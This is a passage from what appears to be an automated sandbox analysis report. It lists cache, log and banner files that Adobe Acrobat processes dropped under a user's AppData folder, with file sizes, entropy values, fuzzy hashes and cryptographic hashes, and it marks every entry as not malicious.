Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.1025849801862595 |
Encrypted: | false |
SSDEEP: | 6:iO4qVjlyq2PqLTwi2nKuAl9OmbnIFUtSqVa/1ZmwsqVapRkwOqLTwi2nKuAl9Omt:7njlyv8wZHAahFUtZa9/LapR5TwZHAae |
MD5: | F6DB93A06A21CBC0DB6478E77F1A6D89 |
SHA1: | 5FD16A8FE6ABACB5B8141409B31421E8367AF803 |
SHA-256: | 649D7931CAEEE18E41A1608819A9613907BFBF558EE23C3AD67A272B65D98338 |
SHA-512: | B7535C5421367158E4BCA6166A9B38A023ACE66861E66087188513F1B7DD4714D007AB61B82CF15F115AAE232308440CB40B40085C45D35C6D71E0712E570C23 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.1025849801862595 |
Encrypted: | false |
SSDEEP: | 6:iO4qVjlyq2PqLTwi2nKuAl9OmbnIFUtSqVa/1ZmwsqVapRkwOqLTwi2nKuAl9Omt:7njlyv8wZHAahFUtZa9/LapR5TwZHAae |
MD5: | F6DB93A06A21CBC0DB6478E77F1A6D89 |
SHA1: | 5FD16A8FE6ABACB5B8141409B31421E8367AF803 |
SHA-256: | 649D7931CAEEE18E41A1608819A9613907BFBF558EE23C3AD67A272B65D98338 |
SHA-512: | B7535C5421367158E4BCA6166A9B38A023ACE66861E66087188513F1B7DD4714D007AB61B82CF15F115AAE232308440CB40B40085C45D35C6D71E0712E570C23 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.066864044793805 |
Encrypted: | false |
SSDEEP: | 6:iO4qVXjyq2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVM1ZmwsqVNRkwOqLTwi2nKuAlx:7nXOv8wZHAa8uFUtZM1/LL5TwZHAa8RJ |
MD5: | A087233CBAC40CB4EE1B9E563A09AE8C |
SHA1: | C42384AD86AB309035FE03E086B2371904AA387B |
SHA-256: | B31A7BC6DA0EB7D2DBEA27F4AE8C33A5AC36498AA54DF63AF949783441A5BEBB |
SHA-512: | 6FFC622B854326C14445D402D5DFE8C34D3BF0739D82AF013DD3F6F17E5AFE34E3FF78363674E065AB81147B03DBEB3A4A4FE79ACC395739BBF56A6F1C0C97AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.066864044793805 |
Encrypted: | false |
SSDEEP: | 6:iO4qVXjyq2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVM1ZmwsqVNRkwOqLTwi2nKuAlx:7nXOv8wZHAa8uFUtZM1/LL5TwZHAa8RJ |
MD5: | A087233CBAC40CB4EE1B9E563A09AE8C |
SHA1: | C42384AD86AB309035FE03E086B2371904AA387B |
SHA-256: | B31A7BC6DA0EB7D2DBEA27F4AE8C33A5AC36498AA54DF63AF949783441A5BEBB |
SHA-512: | 6FFC622B854326C14445D402D5DFE8C34D3BF0739D82AF013DD3F6F17E5AFE34E3FF78363674E065AB81147B03DBEB3A4A4FE79ACC395739BBF56A6F1C0C97AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.956836384183677 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxsBdOg2Hbcaq3QYiub5P7E4T3y:Y2sRdszdMHi3QYhbt7nby |
MD5: | 89E85520BDEA9D0CF330CF101FCC3A60 |
SHA1: | DECBBFA416EC0E7BD9FCBBFF1A84AF48146B258B |
SHA-256: | B298771293F28AE8069CA0AF0308387D4CC16E660E2498D88BBF237CA132371E |
SHA-512: | 0ED691B41F96AF46737F5954A590BC6BFD0FB76B2B0A32A67A5CD09C7AEB717852A7602080C0C17D41FD8345DA5E4791FA463740B2C3ED721458C11BE741D36A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e7b6de8b-6eae-45a0-9f1e-908f3842f953.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.956836384183677 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxsBdOg2Hbcaq3QYiub5P7E4T3y:Y2sRdszdMHi3QYhbt7nby |
MD5: | 89E85520BDEA9D0CF330CF101FCC3A60 |
SHA1: | DECBBFA416EC0E7BD9FCBBFF1A84AF48146B258B |
SHA-256: | B298771293F28AE8069CA0AF0308387D4CC16E660E2498D88BBF237CA132371E |
SHA-512: | 0ED691B41F96AF46737F5954A590BC6BFD0FB76B2B0A32A67A5CD09C7AEB717852A7602080C0C17D41FD8345DA5E4791FA463740B2C3ED721458C11BE741D36A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.222596595223757 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzML7k6Eos:1CDLCmPj8j0/8qKgwPHYPx8xemT8OzMO |
MD5: | 7C430290AF72F71EC2181030452293D2 |
SHA1: | D7946CA2BB0558604DB909F42C661B343AEC44E5 |
SHA-256: | F7B5AAB9502C7E1BC6A429A88BA1F08A468B13CFA7F354E80DAD5E329D263F55 |
SHA-512: | ED6E10AE6C757E7725550F3DCBB901F2CA638FFF137B0F9563B7F596CAC8B411708AFF4B83FD5B0FA843D72CAB89F2C2393914C29CF5C16E82A600B3C0026EFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.106449674752313 |
Encrypted: | false |
SSDEEP: | 6:iO4qVsHyq2PqLTwi2nKuAl9OmbzNMxIFUtSqViR1ZmwsqViHRkwOqLTwi2nKuAlG:7nsSv8wZHAa8jFUtZO1/Lg5TwZHAa84J |
MD5: | 7B82951C2EBE2DD74D8E347B529129C4 |
SHA1: | 63DD852EE260145E4382EE2E714A60D40A72D8E7 |
SHA-256: | FE21A4787C4D455131E10E625407DE46D5E7046DFC64EE290C600DFD011F074C |
SHA-512: | B228F0FDAF6065CA57EFF16BDE037D9057EBB67DB5B79239163843643445973FE2B19515339024A9A3451480D6C5920C493E234CAFDF7533B4C57F66EED47A62 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.106449674752313 |
Encrypted: | false |
SSDEEP: | 6:iO4qVsHyq2PqLTwi2nKuAl9OmbzNMxIFUtSqViR1ZmwsqViHRkwOqLTwi2nKuAlG:7nsSv8wZHAa8jFUtZO1/Lg5TwZHAa84J |
MD5: | 7B82951C2EBE2DD74D8E347B529129C4 |
SHA1: | 63DD852EE260145E4382EE2E714A60D40A72D8E7 |
SHA-256: | FE21A4787C4D455131E10E625407DE46D5E7046DFC64EE290C600DFD011F074C |
SHA-512: | B228F0FDAF6065CA57EFF16BDE037D9057EBB67DB5B79239163843643445973FE2B19515339024A9A3451480D6C5920C493E234CAFDF7533B4C57F66EED47A62 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.437963270959362 |
Encrypted: | false |
SSDEEP: | 384:Sebci5GMiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:EgurVgazUpUTTGt |
MD5: | B63D4811E70C7084DE12C611A9F27CDF |
SHA1: | E97E07CFB56D2485F0A7A087A120B101A1373646 |
SHA-256: | 939DB44BAA86B2B611A9F44FBAED91D9EC53409CD8116ACF067F9B4FB01F9AD3 |
SHA-512: | B65D35C8E0AF400C32FE851E72C6E3E760CCFC2EE57E2709080537BAB166B27D3B025B4CB9D0BAE72E67B90CE2FF2A0581F91AD186175D33D589709A4859E76C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2149883181453993 |
Encrypted: | false |
SSDEEP: | 24:7+tJ56wKmqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzs:7M7WmqPmFTIF3XmHjBoGGR+jMz+LhZ |
MD5: | 6CB3E74A0D7F60CE34BEE75743B36426 |
SHA1: | A8A371F6F0067281519EF86B499A14AF1538A9B7 |
SHA-256: | 41805387F286F2B998B9FFC25772C88D576F553D54E98E313F8DD899BB868478 |
SHA-512: | B6D5BDEEDFCF33142F584502980D067F13C7E316E07CC4FFC3255D007AD28678F4B9F65B67CC1E3CC9E131E7C6C58B08725F61BAC5522BA5E4AF029B15B6F341 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklmIgpkltfllXlE/HT8kFllltNNX8RolJuRdxLlGB9lQRYwpDdt:kK/IgyeT8gVNMa8RdWBwRd |
MD5: | BCEC72CFC5DA96F2A93CF32CCA479D80 |
SHA1: | 53C6B35F3A4AD52A428AA3D18FF593B5A6B6F3AB |
SHA-256: | D177F69D6B6E6C2DEA8438C504AA9544719BD79E22576DB05B6B25B651CD6FA2 |
SHA-512: | F0A5C0292AF60F98AA1688599C6E1F0B849635947191E47BE043043D0308FB439483E870120F3AB03604F3DD663F2AA6D8A8C661D20ABE57C9B411A27056EF97 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.133081597444441 |
Encrypted: | false |
SSDEEP: | 6:kKI1L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:g1iDnLNkPlE99SNxAhUe/3 |
MD5: | 5FB5435471F73F7C0735FDE6952DFC2D |
SHA1: | 86AFD109EEDBD1C3DBB6E1BB2219E39A5B991CC6 |
SHA-256: | 1680FE02C2E89C6073FE28525566667EB2DFF4E2BBE925B9371F11FB5A662B4C |
SHA-512: | 64C78817314354B26A716D8F2BF1B4FB5B5A4A4220EB816E0BECC943A3D44C1EC8A590F4E37374555000C2DB57A733BC583D7E3CF1688507E744600D006C2C2D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.369015137087167 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJM3g98kUwPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGMbLUkee9 |
MD5: | 601BC5895C3AD1BB240A4CA6E0F220FC |
SHA1: | 50A90D1D1A0A0B9A4C3AE555F81B9C7CF0778EF8 |
SHA-256: | 36E3502D510CED5D3C5218F98099A47CAA1C67BE0EB8286F85F92F4F554AA050 |
SHA-512: | 84E1E336CAE29ABD522DDA5FD9B01154C51421EBC5CAFD5EA6B8BB813551437A9D3CCF1009984F36A6B72776C013073434E566816401DD7FE3621BBDE15AFB9C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.32262097600366 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfBoTfXpnrPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGWTfXcUkee9 |
MD5: | BCEA9ABA931F6811BBA8D54E79FEC570 |
SHA1: | D349752F2300FFB893ECB39A820C79C4442CF66C |
SHA-256: | AC0870254AEEE745A1D18196A2173C000C696767CCB8262F2CAC7032FFDE2F6C |
SHA-512: | D3EC507E8D518D4EA45C674ADEEAC909097A0C142C0ABB6E4A411ACBF0341565D16E1F7076E99527EDAACF943F05D649C69646DDD1215838DF9376B8A2CE2E2E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.301020294872091 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfBD2G6UpnrPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGR22cUkee9 |
MD5: | 94A86DFD7DE62557AA9964B0A5F070B5 |
SHA1: | 7B29B2D2F841E8CE9FF4D0D54E60E7BF5BF3C2DB |
SHA-256: | 2F2E4CBFC1A008F8B9AA2D5BE1122EB913F58FAC5357991298584B614D5C5720 |
SHA-512: | 21602AB6BB39659AA82F5081F1AFFEAB6F66F53AAB6764F2A2981F7A169304CCD487EBB09A61578D8E4EDA0012087C510A24892F92AC8C4DC88AE06AA8CC0E4C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.350215476690469 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfPmwrPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGH56Ukee9 |
MD5: | 9AF0F69EABA37D1D06D90CCE9091F898 |
SHA1: | 3F6F4BDF1D4780FEE8BCD9862CE46EF72C75F50A |
SHA-256: | DF3DDF8CAE06933C7456054FA00168AD8A7B04F261E3922A0EB42444EE30DD9B |
SHA-512: | C2C8FA61AC92C4F01B1FD561F0F221A72DBD1E6BAF38DB6B0A25F07D8F95AC23E20BE3A9FAD2A7D701B9FD9451E41DE0FAD68501B69D51F8DF887121ED15224B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.698141441304057 |
Encrypted: | false |
SSDEEP: | 24:Yv6XrYluxT5XIb7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSAx:YvdlYXq7hgy6SAFv5Ah8cv/Ax |
MD5: | DF1FEB1E9A27FA6015CCD96CCFBEE983 |
SHA1: | 60EE601E11D93E78163C4B417F942E480394A2C7 |
SHA-256: | 57879D25147FCA2A603EB2B2B1A1FF4F84AB27BCA2133D44C0443B7B1307C6A2 |
SHA-512: | 70DCBF6F8D4C2A46CC791D4284E504868B00C33B8CA8CC3BFB380F980531C9C074848D7BFA42AD8C4FC66DED6A4E8A745589E8D1D5176B49405825EDA8AA4B09 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.324252015837679 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJf8dPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGU8Ukee9 |
MD5: | A2CF0CA5BDA011445954D982F275546B |
SHA1: | CE7A261CAEAE106723D26A548E12B243358661D2 |
SHA-256: | 46DA5401A2C59F864621E899C1F5188DCEB1430484BA0DB941CADEB536ECE8D0 |
SHA-512: | 96A3B3EDF696AF64941664F8462EFC98C9CA7ABF2788089C93C5D5CD237078225CD798176586112A7F188D86B132C2E2C0A0FE78C1747504B737C7B623EF1950 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.316432300641241 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfQ1rPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGY16Ukee9 |
MD5: | 76E9A496A77379C526597C86B136356B |
SHA1: | 2B52AF7286BDCC5843DAF3E8F440C5A9727BE46B |
SHA-256: | A582315AE3FD66B45A3BA9F737A82DAC14E7F26BFC5257C747BF2DD505F7FEC4 |
SHA-512: | 48FE284DBAF0A9671F54A0192802A68453CB86725222DCBB9A2AE1E9C4B9C2BBC5703F23CE22C2B9738135B0BBC97E60FAF673AB07B51CAA3BFC70925102F918 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.332989589884433 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfFldPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGz8Ukee9 |
MD5: | 19FD6E0B8B78E2518C030B61B520BE62 |
SHA1: | 347A0843001169715A48F64615812CA701311319 |
SHA-256: | E968FC68ACC98A03A6F0459F76BA94D860BA1A17B3E49D3C7DB5B2853C6D00AF |
SHA-512: | 766B069968F4DE3A73F2B40CBB9920A6594626A70CF7D0999187DA685EE1A2D136DF92617F0C211D085E0022FFC9F3126E48D5A1E2B4BCD7F1314228CD2217BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.349722805473784 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfzdPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGb8Ukee9 |
MD5: | 2F452C33818539A8D637E4FC07ADE7F8 |
SHA1: | 28FD4A9E6FDD27C5B998A9BA43FDFE9DF8ABF53F |
SHA-256: | CA96E7E19B58B4100D69A00CB252E83E83B7113DDDD4513607F2C096B480AF24 |
SHA-512: | 0AF5EE864E9AB8C53C7FF75E2A1E8D81EAB20CFD989CB105C8F76742AED9DAE650820D4EC757630F4B429D2D85463427C6A082280A8228D1CF559E2A5D274DFD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.331274320261631 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJfYdPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOGg8Ukee9 |
MD5: | 366C81538A5A51F29554FC427D413E4B |
SHA1: | 9977B15DB902126AF5803AA6D806A795286C39FB |
SHA-256: | DA35D5596272F921C8AE14CF23548D40AC27FB0FC30BC8D34838A815FF50543D |
SHA-512: | A4EDD242FF1F9A213AA0148C666E5375ED0B273E538C420DBF160FEC04AC60B78E1EFC933F8A96DA0C62EF763AFF71C3AA19360BB6EABF7A8BEC9F740B0F5AEA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.317557595781421 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXrYl1wXJ4mSg1c2LjcWkHvR0Y6doxoAvJf+dPeUkwRe9:YvXKXrYl1wXhT5LjIPGaOG28Ukee9 |
MD5: | E568E0ED81B0D9D11B770DD2B7DB3EC5 |
SHA1: | 4597038129D04FE88ED2F7C66CAEFCF81DE17E97 |
SHA-256: | DD0482073F5F5BB4330AE8897116DF072FAC6F6037781A8438B4842103AE14C5 |
SHA-512: | 6A9D1D69F9FA96B850B51A9FE4DF8A5AF542EAE3628EF7CC935D44E0FF7A7B42C2E1A01F8EA0DB9FDD50275CF6E01E818948739934B0BC396138121A806FF89B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.314606474153628 |
Encrypted: | false |
